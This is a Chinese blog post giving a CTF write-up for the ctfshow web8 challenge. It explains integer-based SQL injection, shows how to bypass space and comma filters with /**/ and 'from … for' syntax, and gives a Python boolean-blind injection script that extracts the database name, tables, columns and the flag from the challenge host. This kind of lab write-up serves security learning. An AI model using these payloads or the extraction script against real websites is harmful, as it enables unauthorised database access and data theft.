ctfshow web8

最新推荐文章于 2024-02-26 16:11:58 发布

cop_g

最新推荐文章于 2024-02-26 16:11:58 发布

阅读量782

点赞数 1

分类专栏： CTF 文章标签： python

本文链接：https://blog.csdn.net/qq_45694932/article/details/120270305

版权

CTF 专栏收录该内容

13 篇文章 0 订阅

订阅专栏

整形注入

判断是字符型还是整形注入
1.检查是否存在注入
2.空格过滤用/**/替换
3. ,过滤：
将limit 0,1样式改为limit 1 offset 0。
将substr(string,1,1)改为substr(string from 1 for 1)。

id=-1 /**/or /**/1=1 返回正确

id=-1/**/or/**/1=2 错误没有回显应该是盲注
说明是整形注入

这里过滤了and

import requests
url='http://e2312a42-19a7-4415-a67b-d64f86d87d53.challenge.ctf.show:8080/index.php?id=-3' 
payload1=url+"/**/or/**/ascii(substr(database()/**/from/**/{}/**/for/**/1))={}"
payload2=url+"/**/or/**/ascii(substr((select(table_name)from/**/information_schema.tables/**/where/**/table_schema=\"web8\"limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
payload3=url+"/**/or/**/ascii(substr((select(column_name)from/**/information_schema.columns/**/where/**/table_name=\"flag\"limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
payload=url+"/**/or/**/ascii(substr((select(flag)from/**/flag/**/limit/**/1/**/offset/**/0)from/**/{}/**/for/**/1))={}"
flag=''
str='1234567890abcdefghijklmnopqrstuvwxyz-{}'
for i in range(200):

    for j in str:
        res=requests.get(payload.format(i,ord(j)))
        # print(payload2.format(i,j))
        if('If' in res.text):
            flag=flag+j
            print(flag)
            if(j=='}'):
                break

cop_g

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
ctfshow web8

整形注入判断是字符型还是整形注入1.检查是否存在注入2.空格过滤用/**/替换3. ,过滤：将limit 0,1样式改为limit 1 offset 0。将substr(string,1,1)改为substr(string from 1 for 1)。id=-1 /**/or /**/1=1 返回正确id=-1/**/or/**/1=2 错误没有回显应该是盲注说明是整形注入这里过滤了andimport requestsurl='http://e2312a42-19a7-4415-
复制链接

扫一扫